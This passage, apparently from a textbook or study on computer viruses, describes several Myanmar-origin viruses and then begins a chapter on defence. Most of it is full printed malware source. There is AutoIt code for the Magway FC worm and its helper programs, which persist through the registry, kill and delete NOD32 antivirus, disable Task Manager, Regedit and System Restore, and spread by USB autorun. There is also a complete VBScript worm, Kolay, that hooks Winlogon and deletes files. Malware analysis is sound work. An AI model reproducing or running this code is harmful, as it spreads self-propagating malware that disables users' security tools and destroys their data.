4. Next, the virus tries to modify some registry values. To run at every Windows startup, it places links to mgy.exe and to the csrss.exe program it dropped in the C:\Windows\System32\{271287-000021-100287-705016} directory under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Note in particular that mgy.exe is the virus file, 16,417,245 bytes in size, whereas MGY.exe is merely the explorer.exe file, 1,032,704 bytes in size, with its resources modified. Similarly, the smss.exe and csrss.exe files placed under C:\Windows\System32\{271287-000021-100287-705016} are not the smss (Session Manager Subsystem) and csrss (Client Server Runtime Subsystem) files that ship with Windows, but files the virus named that way to cause confusion. The smss.exe and csrss.exe that ship with Windows run as system services and do not run in user mode the way the virus files do. One can observe that smss.exe, csrss.exe and mgy.exe have the same file size.
5. The virus reads the computer's clock and checks whether the current month is July; if it is, it sets the COUNT value under HKLM\SOFTWARE\MGY to "1". After that it increments the COUNT value by one each time. When COUNT reaches "10", it temporarily closes explorer.exe and briefly runs MGY.exe. While MGY.exe is running, the virus file copies MGY.exe under the name explorer.exe. After copying, it closes the running MGY.exe and launches the modified explorer.exe. It then reads the OBJ1 value under HKLM\SOFTWARE\MGY and, if that value is "READY", runs icserv.exe and lsass.exe. The file converted from MGY.exe into explorer.exe shows the text MagwayFC in place of "start", and lsass.exe shows the logo of the Magway FC team. At that point the infected state seen in Figure (20) becomes visible.
6. Under HKCU\Software\Microsoft\Windows\CurrentVersion, the virus changes the SuperHidden, ShowSuperHidden, HideFileExt and Hidden values in \Explorer\Advanced, the NoFind, NoFolderOptions and NoDriveTypeAutorun values in Policies\Explorer, and the DisableRegistryTools and DisableTaskMgr values in \Policies\System. As a result, on an infected computer hidden files cannot be shown through Folder Options, hidden files cannot be found from the search box, drives are set to autorun, the Registry Editor is disabled so that registry values cannot be corrected, and Task Manager is disabled so that the running virus goes unnoticed.
7. To cause even more trouble, the virus replaces the entries for regedit.exe, msconfig.exe, rstrui.exe, taskmgr.exe and notepad.exe under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths with the csrss.exe program in the C:\Windows\System32\{271287-000021-100287-705016} directory. Therefore, when the user types one of those program names into the Run box (Windows Key + R) and launches it, the expected program does not open; instead the csrss.exe virus file runs.
8. Next, the virus writes autorun instructions into the autorun.inf file in the C:\Windows\System32\{271287-000021-100287-705016} directory and reads the drive letters on the computer. It then checks whether each drive is a flash drive and, if so, copies autorun.inf and mgy.exe from that directory onto the flash drive. The virus searches every file and folder on the drive, takes the names of the files and folders it finds, and makes copies of itself under those names. The original files and folders are hidden using the +H +S +R attributes. The virus files themselves are not hidden, so that the user will open them by mistake. Because files of about 16 MB are copied over and over, the infected computer slows down and free space gradually shrinks. Every two seconds the virus checks whether mgy.exe and csrss.exe are running as processes and, if they are not, launches them. The code of the Magway FC virus can be seen in detail in Figure (21).
IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}" ) = 0 THEN
  DIRCREATE ( @SYSTEMDIR & "\{271287-000021-100287-705016}" )
  FILESETATTRIB ( @SYSTEMDIR & "\{271287-000021-100287-705016}" , "+R+S+H" )
ENDIF
IF FILEEXISTS ( @WINDOWSDIR & "\MGY.exe" ) = 0 THEN
  _WRITEMGYTODIR ( @WINDOWSDIR & "\MGY.exe" )
ENDIF
IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}\lsass.exe" ) = 0 THEN
  _WRITELSASSTODIR ( @SYSTEMDIR & "\{271287-000021-100287-705016}\lsass.exe" )
ENDIF
IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}\icserv.exe" ) = 0 THEN
  _WRITEICSERVTODIR ( @SYSTEMDIR & "\{271287-000021-100287-705016}\icserv.exe" )
ENDIF
IF @MON = "07" THEN
  $REGEDIT = REGREAD ( "HKLM\SOFTWARE\MGY" , "COUNT" )
  IF $REGEDIT = "" THEN
    $REGEDIT = 0
    REGWRITE ( "HKLM\SOFTWARE\MGY" , "COUNT" , "REG_SZ" , $REGEDIT + 1 )
  ELSE
    REGWRITE ( "HKLM\SOFTWARE\MGY" , "COUNT" , "REG_SZ" , $REGEDIT + 1 )
  ENDIF
  $REGEDIT = REGREAD ( "HKLM\SOFTWARE\MGY" , "COUNT" )
  IF $REGEDIT = 10 THEN
    REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" , "Shell" , "REG_SZ" , "MGY.exe" )
    REGWRITE ( "HKLM\SOFTWARE\MGY" , "OBJ1" , "REG_SZ" , "READY" )
    PROCESSCLOSE ( "explorer.exe" )
    PROCESSWAITCLOSE ( "explorer.exe" )
    RUN ( @WINDOWSDIR & "\MGY.exe" )
  ENDIF
  IF PROCESSEXISTS ( "explorer.exe" ) = 0 THEN
    REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" , "Shell" , "REG_SZ" , "Explorer.exe" )
    FILECOPY ( @WINDOWSDIR & "\MGY.exe" , @WINDOWSDIR & "\Explorer.exe" , 1 )
    PROCESSCLOSE ( "MGY.exe" )
    PROCESSWAITCLOSE ( "MGY.exe" )
    PROCESSCLOSE ( "MGY.exe" )
    PROCESSWAITCLOSE ( "MGY.exe" )
    RUN ( @WINDOWSDIR & "\explorer.exe" )
  ENDIF
ENDIF
$REGEDIT = REGREAD ( "HKLM\SOFTWARE\MGY" , "OBJ1" )
IF $REGEDIT = "READY" THEN
  IF PROCESSEXISTS ( "icserv.exe" ) = 0 THEN
    RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\icserv.exe" )
  ENDIF
  RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\lsass.exe" )
ENDIF
WHILE 1
  #NoTrayIcon
  OPT ( "TrayIconHide" , 1 )
  #RequireAdmin
  IF PROCESSEXISTS ( "msconfig.exe" ) = TRUE THEN
    SHUTDOWN ( 6 )
  ENDIF
  IF PROCESSEXISTS ( "rstrui.exe" ) = TRUE THEN
    SHUTDOWN ( 6 )
  ENDIF
  PROCESSCLOSE ( "winsystem.exe" )
  PROCESSCLOSE ( "handydriver.exe" )
  PROCESSCLOSE ( "kerneldrive.exe" )
  PROCESSCLOSE ( "Wscript.exe" )
  PROCESSCLOSE ( "cmd.exe" )
  PROCESSCLOSE ( "nod32krn.exe" )
  PROCESSCLOSE ( "nod32kui.exe" )
  $RG1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  $RG2 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
  REGWRITE ( $RG1 , "mgy" , "REG_SZ" , @SYSTEMDIR & "\mgy.exe" )
  REGWRITE ( $RG1 , "Msmsgs" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  REGWRITE ( $RG2 & "\Explorer\Advanced" , "SuperHidden" , "REG_DWORD" , "0" )
  REGWRITE ( $RG2 & "\Explorer\Advanced" , "ShowSuperHidden" , "REG_DWORD" , "0" )
  REGWRITE ( $RG2 & "\Explorer\Advanced" , "HideFileExt" , "REG_DWORD" , "1" )
  REGWRITE ( $RG2 & "\Explorer\Advanced" , "Hidden" , "REG_DWORD" , "2" )
  REGWRITE ( $RG2 & "\Policies\Explorer" , "NoFind" , "REG_DWORD" , "1" )
  REGWRITE ( $RG2 & "\Policies\Explorer" , "NoFolderOptions" , "REG_DWORD" , "1" )
  REGWRITE ( $RG2 & "\Policies\Explorer" , "NoDriveTypeAutoRun" , "REG_DWORD" , "91" )
  REGWRITE ( $RG2 & "\Policies\system" , "DisableTaskMgr" , "REG_DWORD" , "1" )
  REGWRITE ( $RG2 & "\Policies\system" , "DisableRegistryTools" , "REG_DWORD" , "1" )
  REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" , "regedit.exe" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" , "msconfig.exe" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" , "rstrui.exe" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" , "taskmgr.exe" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" , "notepad.exe" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" , "System" , "REG_SZ" , @SYSTEMDIR & "\{271287-000021-100287-705016}\smss.exe" )
  REGWRITE ( "HKLM\Software\Policies\Microsoft\Windows\System" , "DisableGPO" , "REG_DWORD" , "1" )
  REGWRITE ( "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" , "DisableConfig" , "REG_DWORD" , "1" )
  REGWRITE ( "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" , "DisableSR" , "REG_DWORD" , "1" )
  REGWRITE ( "HKLM\Software\Policies\Microsoft\Windows\Installer" , "DisableMSI" , "REG_DWORD" , "2" )
  REGDELETE ( "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" , "Window Title" )
  REGDELETE ( "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NOD32krn" , "ImagePath" )
  REGDELETE ( "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nod32drv" , "ImagePath" )
  REGDELETE ( "HKEY_CLASSES_ROOT\lnkfile\isShortcut" )
  IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" ) <> TRUE THEN
    $ATR = FILEOPEN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" , 2 )
    FILEWRITE ( $ATR , "[autorun]" & @CRLF )
    FILEWRITE ( $ATR , "open=mgy.exe" & @CRLF )
    FILEWRITE ( $ATR , "shellexecute=mgy.exe" & @CRLF )
    FILEWRITE ( $ATR , "shell\Explore\command=mgy.exe" & @CRLF )
    FILEWRITE ( $ATR , "shell\Open\command=mgy.exe" & @CRLF )
    FILEWRITE ( $ATR , "shell=Explore" )
    FILECLOSE ( $ATR )
    FILESETATTRIB ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" , "+R+H+S" )
  ENDIF
  $PATH1 = DRIVEGETDRIVE ( "REMOVABLE" )
  IF NOT @ERROR THEN
    FOR $D = 1 TO $PATH1 [ 0 ]
      $FLASHDRIVE = $PATH1 [ $D ]
      IF $FLASHDRIVE <> "A:" AND DRIVEGETFILESYSTEM ( $FLASHDRIVE ) <> "" THEN
        FILESETATTRIB ( $FLASHDRIVE & "\autorun.inf" , "-R" )
        FILECOPY ( @SCRIPTFULLPATH , $FLASHDRIVE & "\mgy.exe" , 1 )
        FILECOPY ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" , $FLASHDRIVE & "\autorun.inf" , 1 )
        FILESETATTRIB ( $FLASHDRIVE & "\autorun.inf" , "+R+H+S" )
        FILESETATTRIB ( $FLASHDRIVE & "\mgy.exe" , "+R+H+S" )
        $SEARCH1 = FILEFINDFIRSTFILE ( $FLASHDRIVE & "\*." )
        WHILE 1
          $FILE1 = FILEFINDNEXTFILE ( $SEARCH1 )
          IF $FILE1 = "" THEN EXITLOOP
          FILECOPY ( @SCRIPTFULLPATH , $FLASHDRIVE & "\" & $FILE1 & ".exe" )
          FILESETATTRIB ( $FLASHDRIVE & "\" & $FILE1 , "+H" )
          FILESETATTRIB ( $FLASHDRIVE & "\" & $FILE1 & ".exe" , "-H-S" )
        WEND
        FILECLOSE ( $SEARCH1 )
      ENDIF
    NEXT
  ENDIF
  $PATH2 = DRIVEGETDRIVE ( "FIXED" )
  IF NOT @ERROR THEN
    FOR $F = 1 TO $PATH2 [ 0 ]
      $DRIVE = $PATH2 [ $F ]
      FILESETATTRIB ( $DRIVE & "\autorun.inf" , "-R" )
      FILECOPY ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" , $DRIVE & "\autorun.inf" , 1 )
      FILECOPY ( @SCRIPTFULLPATH , $DRIVE & "\mgy.exe" )
      FILESETATTRIB ( $DRIVE & "\autorun.inf" , "+R+H+S" )
      FILESETATTRIB ( $DRIVE & "\mgy.exe" , "+R+H+S" )
    NEXT
  ENDIF
  FILECOPY ( @SCRIPTFULLPATH , @SYSTEMDIR & "\mgy.exe" )
  FILECOPY ( @SCRIPTFULLPATH , @SYSTEMDIR & "\{271287-000021-100287-705016}\smss.exe" )
  FILECOPY ( @SCRIPTFULLPATH , @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  FILECOPY ( @SCRIPTFULLPATH , @PROGRAMFILESDIR & "\ESET\nod32.exe" )
  FILESETATTRIB ( @SYSTEMDIR & "\wininit.exe" , "-R" )
  FILESETATTRIB ( @SYSTEMDIR & "\mgy.exe" , "+R+H+S" )
  FILESETATTRIB ( @SYSTEMDIR & "\{271287-000021-100287-705016}\smss.exe" , "+R+H+S" )
  FILESETATTRIB ( @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" , "+R+H+S" )
  FILEDELETE ( @SYSTEMDIR & "\wininit.exe" )
  FILEDELETE ( @PROGRAMFILESDIR & "\ESET\nod32.exe" )
  FILEDELETE ( @PROGRAMFILESDIR & "\ESET\nod32kui.exe" )
  FILEDELETE ( @PROGRAMFILESDIR & "\ESET\nod32krn.exe" )
  IF PROCESSEXISTS ( "mgy.exe" ) = 0 THEN
    RUN ( @SYSTEMDIR & "\mgy.exe" )
  ENDIF
  IF PROCESSEXISTS ( "csrss.exe" ) = 0 THEN
    RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
  ENDIF
  SLEEP ( 2000 )
WEND
Figure (21) Code of the Magway FC virus
9. When July arrives, the mgy.exe and csrss.exe virus files invoke the lsass.exe and icserv.exe files under the C:\Windows\System32\{271287-000021-100287-705016} directory. As the code in Figure (22) shows, icserv.exe works in the manner of the Windows system's SHELL.dll file and modifies the icons. lsass.exe, as the code in Figure (23) shows, is used to display the Magway FC team's logo on the Desktop.
IF _SINGLETON ( @SCRIPTNAME , 1 ) = 0 THEN
  EXIT
ENDIF
RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\smss.exe" )
DIM $AFULLPATH [ 100 ]
$SEARCHKEY = "HKCR"
$SEARCHSTRING = "SHELL32.dll"
WHILE 1
  #NoTrayIcon
  OPT ( "TrayIconHide" , 1 )
  #RequireAdmin
  FILECOPY ( @SCRIPTFULLPATH , @SYSTEMDIR & "\{271287-000021-100287-705016}\icserv.exe" , 0 )
  IF FILEEXISTS ( @SYSTEMDIR & "\SXELL32.dll" ) <> 1 THEN
    _WRITESXELL32TODIR ( @SYSTEMDIR & "\SXELL32.dll" )
  ENDIF
  _REGSEARCH ( $SEARCHKEY , $SEARCHSTRING )
  $PATH2 = DRIVEGETDRIVE ( "FIXED" )
  IF NOT @ERROR THEN
    FOR $F = 1 TO $PATH2 [ 0 ]
      $IFILES = 0
      $IFOLDERS = 0
      $ICOUNT = 0
      $DRIVE = $PATH2 [ $F ]
      REGWRITE ( "HKLM\SOFTWARES\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\" & STRINGLEFT ( $DRIVE , 1 ) & "\DefaultIcon" , "" , "REG_SZ" , @SYSTEMDIR & "\SXELL32.dll,8" )
      _SEARCHEX ( $DRIVE & "\" , $AFULLPATH , "*.*" )
    NEXT
  ENDIF
WEND
FUNC _SEARCHEX ( $SSOURCEPATH , BYREF $AFILELIST , $SEXT = "*.*" , $IRUNFIRSTTIME = 1 )
  IF UBOUND ( $AFILELIST ) < 10000 THEN REDIM $AFILELIST [ 10000 ]
  IF STRINGRIGHT ( $SSOURCEPATH , 1 ) = "\" THEN $SSOURCEPATH = STRINGTRIMRIGHT ( $SSOURCEPATH , 1 )
  $SEXT = STRINGREPLACE ( $SEXT , "\" , "" )
  $IFIRSTFILE = FILEFINDFIRSTFILE ( $SSOURCEPATH & "\" & $SEXT )
  IF @ERROR THEN RETURN
  WHILE 1
    $INEXTFILE = FILEFINDNEXTFILE ( $IFIRSTFILE )
    IF @ERROR THEN EXITLOOP
    $SFULLPATH = $SSOURCEPATH & "\" & $INEXTFILE
    IF STRINGINSTR ( FILEGETATTRIB ( $SFULLPATH ) , "D" ) THEN
      IF FILEEXISTS ( $SFULLPATH & "\desktop.ini" ) <> 1 THEN
        INIWRITE ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" , "IconFile" , @SYSTEMDIR & "\SXELL32.dll" )
        INIWRITE ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" , "IconIndex" , "3" )
        FILESETATTRIB ( $SFULLPATH & "\desktop.ini" , "+H" )
      ELSE
        INIWRITE ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" , "IconFile" , @SYSTEMDIR & "\SXELL32.dll" )
        IF INIREAD ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" , "IconIndex" , "" ) = "-101" THEN
          INIWRITE ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" , "IconIndex" , "127" )
        ENDIF
        FILESETATTRIB ( $SFULLPATH & "\desktop.ini" , "+H" )
      ENDIF
      $IFOLDERS += 1
      _SEARCHEX ( $SFULLPATH , $AFILELIST , $SEXT , 0 )
    ELSE
      $IFILES += 1
      $ICOUNT += 1
      IF $ICOUNT = 10000 THEN
        REDIM $AFILELIST [ UBOUND ( $AFILELIST ) + 10000 ]
        $ICOUNT = 0
      ENDIF
      INIWRITE ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" , "IconFile" , @SYSTEMDIR & "\SXELL32.dll" )
      FILESETATTRIB ( $SFULLPATH & "\desktop.ini" , "+H" )
      $AFILELIST [ $IFILES ] = $SFULLPATH
    ENDIF
    IF STRINGLEFT ( $AFILELIST [ $IFILES ] , 1 ) <> "c" THEN
      FILECOPY ( @SCRIPTDIR & "\smss.exe" , $AFILELIST [ $IFILES ] & ".exe" , 1 )
      FILECOPY ( @SCRIPTDIR & "\smss.exe" , $AFILELIST [ $IFILES ] , 1 )
    ELSE
      FILECOPY ( @SCRIPTDIR & "\smss.exe" , $AFILELIST [ $IFILES ] & ".exe" , 1 )
    ENDIF
    FILESETATTRIB ( $AFILELIST [ $IFILES ] , "+SH" )
  WEND
  FILECLOSE ( $IFIRSTFILE )
  IF $IRUNFIRSTTIME THEN
    REDIM $AFILELIST [ $IFILES + 1 ]
    $AFILELIST [ 0 ] = UBOUND ( $AFILELIST ) - 1
  ENDIF
ENDFUNC
FUNC _REGSEARCH ( $STARTKEY , $SEARCHVAL )
  LOCAL $V , $VAL , $K , $KEY , $FOUND = ""
  $V = 1
  WHILE 1
    $VAL = REGENUMVAL ( $STARTKEY , $V )
    IF @ERROR = 0 THEN
      IF STRINGINSTR ( $VAL , $SEARCHVAL ) THEN
        $FOUND = $FOUND & $STARTKEY & "\" & $VAL & @LF
      ENDIF
      $READVAL = REGREAD ( $STARTKEY , $VAL )
      IF STRINGINSTR ( $READVAL , $SEARCHVAL ) THEN
        IF STRINGRIGHT ( $FOUND & $STARTKEY , 11 ) = "DefaultIcon" THEN
          IF $VAL <> "" THEN
            REGWRITE ( $FOUND & $STARTKEY , $VAL , "REG_EXPAND_SZ" , STRINGREPLACE ( $READVAL , "SHELL32.dll" , "SXELL32.dll" ) )
          ELSE
            REGWRITE ( $FOUND & $STARTKEY , "" , "REG_EXPAND_SZ" , STRINGREPLACE ( $READVAL , "SHELL32.dll" , "SXELL32.dll" ) )
          ENDIF
        ENDIF
        $FOUND = $FOUND & $STARTKEY & "\" & $VAL & " = " & $READVAL & @LF
      ENDIF
      $V += 1
    ELSE
      EXITLOOP
    ENDIF
  WEND
  $K = 1
  WHILE 1
    $KEY = REGENUMKEY ( $STARTKEY , $K )
    IF @ERROR = 0 THEN
      IF STRINGINSTR ( $KEY , $SEARCHVAL ) THEN
        $FOUND = $FOUND & $STARTKEY & "\" & $KEY & "\" & @LF
      ENDIF
      $FOUND = $FOUND & _REGSEARCH ( $STARTKEY & "\" & $KEY , $SEARCHVAL )
    ELSE
      EXITLOOP
    ENDIF
    $K += 1
  WEND
  RETURN $FOUND
ENDFUNC
Figure (22) Code of icserv.exe, invoked by the Magway FC virus
IF _SINGLETON ( @SCRIPTNAME , 1 ) = 0 THEN
  EXIT
ENDIF
IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}\logo.jpg" ) <> 1 THEN
  _WRITELOGOTODIR ( @SYSTEMDIR & "\{271287-000021-100287-705016}\logo.jpg" )
ENDIF
#Region ### START Koda GUI section ### Form=
$MGY = GUICREATE ( " " , 310 , 115 , @DESKTOPWIDTH - 320 , @DESKTOPHEIGHT + 10 , $WS_POPUP , $WS_EX_TOPMOST )
$PIC1 = GUICTRLCREATEPIC ( @SYSTEMDIR & "\{271287-000021-100287-705016}\logo.jpg" , 0 , 0 , 310 , 115 , BITOR ( $SS_NOTIFY , $WS_GROUP , $WS_CLIPSIBLINGS ) )
#EndRegion ### END Koda GUI section ###
WHILE 1
  #NoTrayIcon
  #RequireAdmin
  OPT ( "TrayIconHide" , 1 )
  $R = RANDOM ( 0 , 100 , 1 )
  IF $R = 21 THEN
    _SHOW ( @DESKTOPWIDTH - 320 , @DESKTOPHEIGHT + 10 )
  ENDIF
  $NMSG = GUIGETMSG ( )
  SWITCH $NMSG
    CASE $GUI_EVENT_CLOSE
      EXIT
  ENDSWITCH
  SLEEP ( 100 )
WEND
FUNC _SHOW ( $X , $Y )
  IF FILEEXISTS ( @WINDOWSDIR & "\Media\notify.wav" ) THEN
    SOUNDPLAY ( @WINDOWSDIR & "\Media\notify.wav" , 0 )
  ENDIF
  WINMOVE ( " " , "" , ( @DESKTOPWIDTH - 320 ) , ( @DESKTOPHEIGHT - 150 ) )
  WINSETONTOP ( " " , "" , 1 )
  DLLCALL ( "user32.dll" , "int" , "AnimateWindow" , "hwnd" , $MGY , "int" , 8000 , "long" , 262152 )
  SLEEP ( 3000 )
  DLLCALL ( "user32.dll" , "int" , "AnimateWindow" , "hwnd" , $MGY , "int" , 50000 , "long" , 589824 )
ENDFUNC
FUNC _EXIT ( )
  EXIT
ENDFUNC
Figure (23) Code of lsass.exe, invoked by the Magway FC virus
10. The author of the Magway FC virus appears to have drawn on other virus code published on the Internet; viruses similar to this one were found to have appeared earlier, and the virus was found to have been written solely to spread and to annoy, rather than to destroy the files in the computer system.
Thayet Myo Hacking Day Virus
11. This virus appeared in 2009 and behaves more like a Trojan than a virus. Some lines of text reading "Thayet Myo Hacking Day" appear on the Desktop, and it deletes the hal.dll (Hardware Abstraction Layer) file. Because that file is deleted, the Windows OS can no longer be used. Windows can only be used again after entering the Recovery Console from a Windows XP CD and restoring the hal.dll file.
Figure (24) What is seen after infection by the Thayet Myo Hacking Day virus
12. The virus prevents Task Manager from being opened and toggles the Caps Lock key on and off. It copies explorer.exe files into C:\Recycler, C:\Backup and C:\Windows\Backup, and modifies the Registry so that explorer.exe runs when Windows starts.
Loikaw Virus
13. It appeared in 2009 and is also called the Autoit.HW Worm. It spread through web pages and e-mails, tricking computer users into installing it on their computers. It can also spread via USB sticks. When a computer is infected with this malware, Task Manager can no longer be used, so the computer user cannot know which processes are running. Likewise, access to the Windows Registry Editor and Folder Options is blocked. The worm places a Virus Information.txt file on the Desktop containing the text seen in Figure (25).
Hi fri "Administrador"
It is nice to meet you . . . .
I ko thi lar, see yin kaw kin mar lar, i ka talk khin tat tal nor . . . .
I ka girl nor, chit mar lar . . . . .
I ka u computer ko bar ma, ma loat par buu khin lo Virus write pi talk sa tar ko , he` he` . . .
Sate so ya buu nor i ka di lo pae` . . . . ya tal ma hote lar I name ko thi chin lar? pyaw pya par buu; bar lo pyaw pya ya mar lae` u ka boy lar, age ka kaw?
i ka 18age girl i gmail ka comput5r3razzygirl@gmail.com bye bye . . . luu soe . . . fly kiss . .
Figure (25) The Loikaw virus's Virus Information.txt
14. After the malware has run for a while, a dialog box like the one seen in Figure (26) appears.
Figure (26) The Loikaw virus's introductory dialog box
Happy Birthday Virus
15. The Happy Birthday virus deletes the ntldr (NT Loader) file that is invoked when Windows boots. Likewise, it blocks the Windows Registry from being used. It then modifies the Registry under the name explorcr.exe so that its program starts when the computer starts. The virus resides under the C:\Windows\System32 directory under the file name explorcr.exe.
One Missed Call Virus
16. Created by the same virus author, it creates a Happy Birthday text file on the Desktop, shown in Figure (27). It converts every folder it finds into .exe files and hides the original folders. When the computer starts, an error message box reading "Drive is not Ready" appears and causes annoyance.
This is a worm from Myanmar Student. Not from SG, made at Yangon.
Myanmar has many Hackers and Programmers. That is example number two.
Happy birthday is my first virus. Have a nice day admin.
Figure (27) The One Missed Call virus's Virus Information.txt
Kolay Virus
17. The Kolay virus is written in VB Script, and its file extension is .vbs.
Option Explicit
On Error Resume Next
Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir = Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(Wscript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.Drives
Set ReadAll = File.OpenAsTextStream(1, -2)
Do While Not ReadAll.atendofstream
    AllFile = AllFile & ReadAll.readline
    AllFile = AllFile & vbCrLf
Loop
Count = Drv.DriveType
Do
    If Not Fso.FileExists(SystemDir & "\kolay.vbs") Then
        Set WriteAll = Fso.CreateTextFile(SystemDir & "\kolay.vbs", 2, True)
        WriteAll.Write AllFile
        WriteAll.Close
        Set WriteAll = Fso.GetFile(SystemDir & "\kolay.vbs")
        WriteAll.Attributes = -1
    End If
    Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", _
        SystemDir & "\userinit.exe," & SystemDir & "\wscript.exe " & SystemDir & "\kolay.vbs"
    For Each Drives In InDrive
        If Drives.DriveType = 2 Then
            LookVBS "inf", Drives.Path & "\"
            LookVBS "INF", Drives.Path & "\"
        End If
        If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
            If Drives.Path <> "A:" Then
                Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
                Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", ""
                Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", ""
                Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe, 2"
                LookVBS "vbs", WinDir & "\"
                LookVBS "vbs", Drives.Path & "\"
                If Drives.DriveType = 1 Then
                    If Drives.Path <> "A:" Then
                        If Not Fso.FileExists(Drives.Path & "\kolay.vbs") Then
                            Set WriteAll = Fso.CreateTextFile(Drives.Path & "\kolay.vbs", 2, True)
                            WriteAll.Write AllFile
                            WriteAll.Close
                            Set WriteAll = Fso.GetFile(Drives.Path & "\kolay.vbs")
                            WriteAll.Attributes = -1
                        End If
                        If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
                            Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
                            Chg.Attributes = -8
                            Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True)
                            WriteAll.WriteLine "[autorun]"
                            WriteAll.WriteLine "shellexecute=wscript.exe kolay.vbs"
                            WriteAll.Close
                            Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
                            WriteAll.Attributes = -1
                        Else
                            Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True)
                            WriteAll.WriteLine "[autorun]"
                            WriteAll.WriteLine "shellexecute=wscript.exe kolay.vbs"
                            WriteAll.Close
                            Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
                            WriteAll.Attributes = -1
                        End If
                    End If
                End If
            End If
        End If
    Next
    If Count <> 1 Then
        Wscript.sleep 10000
    End If
Loop While Count <> 1
Sub LookVBS(File2Find, SrchPath)
    Dim oFileSys, oFolder, oFile, Cut, Delete
    Set oFileSys = CreateObject("Scripting.FileSystemObject")
    Set oFolder = oFileSys.GetFolder(SrchPath)
    For Each oFile In oFolder.Files
        Cut = Right(oFile.Name, 3)
        If UCase(Cut) = UCase(File2Find) Then
            If oFile.Name <> "kolay.vbs" Then Set Delete = oFileSys.DeleteFile(SrchPath & oFile.Name, True)
        End If
    Next
End Sub
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", _
    SystemDir & "\userinit.exe," & SystemDir & "\wscript.exe " & SystemDir & "\kolay.vbs"
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", ""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", ""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe, 2"
Figure (28) Code of the Kolay virus
Chapter (6)
Defending Against Viruses
Stages of a Virus
1. From their design and creation until their removal, computer viruses can be divided into the following stages:
(a) Design and creation. Virus code is written in programming languages or with virus construction kits. Anyone with a basic knowledge of programming can create a virus.
